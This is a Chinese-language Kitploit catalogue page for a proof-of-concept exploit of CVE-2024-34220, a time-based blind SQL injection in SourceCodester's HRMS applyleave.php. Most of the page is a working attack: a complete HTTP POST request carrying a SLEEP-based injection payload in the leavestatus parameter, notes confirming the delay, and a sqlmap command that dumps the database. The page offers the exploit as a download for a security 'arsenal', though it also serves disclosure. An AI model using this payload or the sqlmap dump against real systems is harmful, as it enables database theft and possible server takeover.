Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-34220 — 针对CVE-2024-34220的概念验证利用,这是SourceCodester HRMS applyleave.php中的一个基于时间的盲SQL注入漏洞,使用sqlmap自动化进行数据库提取。 | Kitploit
工具/GitHubGitHub/dovankha/cve-2024-34220
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubdovankha/cve-2024-34220

CVE-2024-34220

针对CVE-2024-34220的概念验证利用,这是SourceCodester HRMS applyleave.php中的一个基于时间的盲SQL注入漏洞,使用sqlmap自动化进行数据库提取。

查看仓库
22年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

基于PHP和MySQL的人力资源管理系统项目免费源代码

提交者:Kha Do

供应商:SourceCodester

受影响和/或已修复版本

漏洞文件

applyleave.php

问题类型

漏洞类型

SQL注入

影响

攻击者可利用此漏洞获取数据库权限,从而导致数据库中大量数据泄露。如果对方数据库拥有DBA权限,则可能进一步获取服务器主机权限。

漏洞利用证明

有效载荷

root@kitploit:~
POST /hrm/user/applyleave.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/hrm/user/applyleave.php
Cookie: PHPSESSID=2v2v2al4dkd4iir9cl5j7oikvr
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: cyan

leavestatus=5'+AND+(SELECT+1337+FROM+(SELECT(SLEEP(5)))VSgR)+AND+'Kha'%3d'123&reason=+++&startdate=03%2F04%2F2024&enddate=29%2F04%2F2024&Apply=Submit

运行此有效载荷后,数据返回时间延迟了5秒,表明我们可能成功执行了 "sleep(5)"。在这种情况下,延迟可能是几倍。我们将在下面验证: SQL_Injection

运行此有效载荷后,数据返回时间延迟了20秒,表明我们可能成功执行了 "sleep(20)"。在这种情况下,延迟可能是几倍。我们将在下面验证: SQL_Injection_1

SQLmap

root@kitploit:~
sqlmap -r <item request> --dump

sqlmap

下载工具